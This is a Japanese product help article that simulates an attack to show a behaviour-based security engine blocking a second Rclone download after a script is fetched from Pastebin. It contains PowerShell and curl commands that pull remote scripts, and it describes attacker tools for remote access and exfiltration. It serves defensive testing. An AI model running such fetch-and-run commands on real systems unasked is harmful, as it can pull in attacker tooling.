ダイナミックプ防止は、脅威を検出して攻撃の面を縮小し、影響を受ける前に脅威を軽減する動的な制御を適用する、行動ベースのセキュリティエンジンです。 詳細については、ダイナミックプ防止とは?を参照してください。
この記事は、ダイナミックプ防止がネットワークを保護する方法を示すために、実際の攻撃シナリオをシミュレートします。 この例では、ユーザーがPastebinからスクリプトをダウンロードし、攻撃者が将来の攻撃を実行するために必要な追加の高リスクツールを取得しようとする方法を試みます。 ダイナミックプ防止は悪意のある動作を識別し、ツールのダウンロードをブロックし、攻撃が進行する前に防ぎます。
この攻撃への対応は完全に自動化されています。 追加のルールは必要ありません。 ダイナミックプ防止を有効にするだけで攻撃を防ぐことができます。
この攻撃をシミュレートするために:
- ブロックされずに高リスクのツールをダウンロードする
- Pastebinからスクリプトをダウンロードする
- 高リスクツールを再度ダウンロードしようと試みる。 この時点では、ダウンロードはブロックされます。
ダイナミックプ防止が、悪意のあるシーケンスの一部である場合のみアクションをブロックすることを示すために、まずRcloneというオープンソースのコマンドラインツールをダウンロードします。 攻撃者は通常、Rcloneを合法的で強力な通常の管理活動と調和するため、事後合意のツールとして使用します。
いずれかからRcloneをダウンロードします:
- 次のURL:
https://downloads.rclone.org/rclone-current-windows-amd64.zip -
Windowsデバイスにおいて:
- 次のPowerShellコマンド:
Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
- 次のPowerShellコマンド:
-
macOS/Linuxデバイスにおいて:
- 次のTerminalコマンド:
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
- 次のTerminalコマンド:
攻撃の開始をシミュレートするために、実行するとRcloneやAnyDeskのようなリモートアクセスと漏えいのための一般的な攻撃者ツールをダウンロードするスクリプトをPastebinからダウンロードします。
Pastebinからスクリプトをダウンロードして実行:
-
Windowsデバイスにおいて:
- 次のPowerShellコマンド:
(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/C5VxKUpE')
- 次のPowerShellコマンド:
-
macOS/Linuxデバイスにおいて:
- 次のTerminalコマンド:
curl -sSL "https://pastebin.com/raw/tXhVK2V7"
- 次のTerminalコマンド:
スクリプトが実行され、ツールをダウンロードします。 ホストに動的制御が適用され、脅威ダッシュボードのコントロール付きホストウィジェットに表示されます。 詳細については、脅威分析の使用を参照してください。
このシミュレートされた攻撃では、攻撃者がRcloneをダウンロードしようとします。 しかし、このアクションがPastebinからスクリプトをダウンロードするという不審な活動に続いており、コントロールが適用されているため、ダイナミックプ防止はRcloneダウンロードをブロックします。
いずれかからRcloneをダウンロードします:
- 次のURL:
https://downloads.rclone.org/rclone-current-windows-amd64.zip -
Windowsデバイスにおいて:
- 次のPowerShellコマンド:
Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
- 次のPowerShellコマンド:
-
macOS/Linuxデバイスにおいて:
- 次のTerminalコマンド:
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
- 次のTerminalコマンド:
0件のコメント
記事コメントは受け付けていません。